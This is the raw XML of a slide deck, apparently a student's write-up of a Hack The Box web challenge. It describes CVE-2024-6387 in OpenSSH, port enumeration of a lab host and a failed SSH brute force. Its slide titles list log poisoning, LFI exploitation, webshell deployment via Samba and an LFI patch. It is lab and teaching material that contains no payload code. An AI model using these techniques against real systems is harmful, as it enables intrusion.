                <a:ea typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> to handle some signals in an unsafe manner. An unauthenticated, remote attacker may be able to trigger it by failing to authenticate within a set time period</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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39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37D4D5-149E-7941-4D40-C39F0490A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pPr rtl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Step-by-Step Progress Breakdown</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="Isosceles Triangle 106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391E3-E03B-747B-18F7-5324867CD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6341016" cy="46039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1200"/>
              </a:spcAft>
              <a:buNone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Service Enumeration (External Target - HTB Host):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone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Target IP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>94.237.54.163</a:t>
            </a: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 (new after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>every </a:t>
            </a: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restart).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone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Nmap Results: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base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Open TCP ports:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone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-  22 (SSH) – OpenSSH 9.2p1 (Debian)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman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                   -   111 (RPC) – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>RPCbind</a:t>
            </a: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 service (v2-4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0" fontAlgn="base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Filtered ports: </a:t>
            </a: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139, 445 (Samba-related ports) – suggesting potential SMB exposure.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman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· UDP Port (RPC):</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman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700">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>111</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>udp</a:t>
            </a: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 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="700" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>rpcbind</a:t>
            </a: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) open.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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700" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Services identified but SSH login brute-force failed (password authentication disabled).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="700" b="0">
              <a:effectLst/>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="700"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="700"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Isosceles Triangle 108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6919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C1A0A-3DC0-F903-AD70-42525DF31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346" y="178106"/>
            <a:ext cx="4786669" cy="522078"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Screenshots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A1A6B6-28BE-AFFF-2B82-7DA37C463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346" y="783862"/>
            <a:ext cx="7311367" cy="249372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261573-BB04-E8A2-D435-5F9B1C329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410" y="3430781"/>
            <a:ext cx="9612217" cy="14653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9B921C-BA48-C890-764F-C26E1F44B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531" y="5206789"/>
            <a:ext cx="4171950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177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9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2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3" name="Isosceles Triangle 72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3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5" name="Isosceles Triangle 104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B410BC7-2A20-A88B-7DB7-C6B6EDF2B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067" y="1578133"/>
            <a:ext cx="4335468" cy="28755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3800" b="0" i="0" u="none" strike="noStrike" kern="120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Local Exploitation (Docker Instance)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3800" b="0" kern="120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3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</a:br>
            <a:endParaRPr lang="en-US" sz="3800" kern="120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63" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973C735C-3C74-1373-67C7-05D3C0CDEB4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116084" y="609601"/>
          <a:ext cx="5511296" cy="5175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5816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5B7DF-B33A-97FC-4046-3DEE92535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pPr rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3700" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Log Poisoning &amp; LFI Exploitation:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="3700" b="0">
                <a:effectLst/>
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="3700">
                <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="3700">
              <a:latin typeface="Algerian" panose="04020705040A02060702" pitchFamily="82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3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD216D61-5E1C-50C0-9FDB-9017C50E67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0685016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9463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311d24c-4d23-404b-a465-09865de98bd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76D5264F695C43886D060A77B541A7" ma:contentTypeVersion="10" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="9cdc688e480662baf32fcabdbaceae17">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="f311d24c-4d23-404b-a465-09865de98bde" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="59e806681cecf7fc94ee096ca4542eff" ns3:_="">
    <xsd:import namespace="f311d24c-4d23-404b-a465-09865de98bde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11d24c-4d23-404b-a465-09865de98bde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700D62B-9939-4E40-841C-B2F4C01085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BB56C42-7E10-4FBE-8966-882E6E31CF25}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="f311d24c-4d23-404b-a465-09865de98bd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BF1A980-7BFF-45AB-A32F-47D0BE226FD7}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="f311d24c-4d23-404b-a465-09865de98bd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f4b8a2-ad4f-41b5-9a91-284d2cc38f56}" enabled="1" method="Standard" siteId="{70de1992-07c6-480f-a318-a1afcba03983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Facet</vt:lpstr>
      <vt:lpstr>Secure Server Hack the Box Category: Web  </vt:lpstr>
      <vt:lpstr>Objective  </vt:lpstr>
      <vt:lpstr>Tools and Techniques Used </vt:lpstr>
      <vt:lpstr>Vulnerability identification  </vt:lpstr>
      <vt:lpstr>CVE Record 2024-6387</vt:lpstr>
      <vt:lpstr>Step-by-Step Progress Breakdown  </vt:lpstr>
      <vt:lpstr>Screenshots</vt:lpstr>
      <vt:lpstr>Local Exploitation (Docker Instance)  </vt:lpstr>
      <vt:lpstr>Log Poisoning &amp; LFI Exploitation:  </vt:lpstr>
      <vt:lpstr>Webshell Deployment via Samba  </vt:lpstr>
      <vt:lpstr>PHP Code Patching (LFI Mitigation)  </vt:lpstr>
      <vt:lpstr> Checker Validation on HTB  </vt:lpstr>
      <vt:lpstr>Current Status  </vt:lpstr>
      <vt:lpstr>Conclusion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Elmorsi, Youssef</dc:creator>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-26T04:08:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-26T06:27:04Z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0x0101007D76D5264F695C43886D060A77B541A7</vt:lpwstr>
  </property>
</Properties>
</file>

<file path=docProps/thumbnail.jpeg>
</file>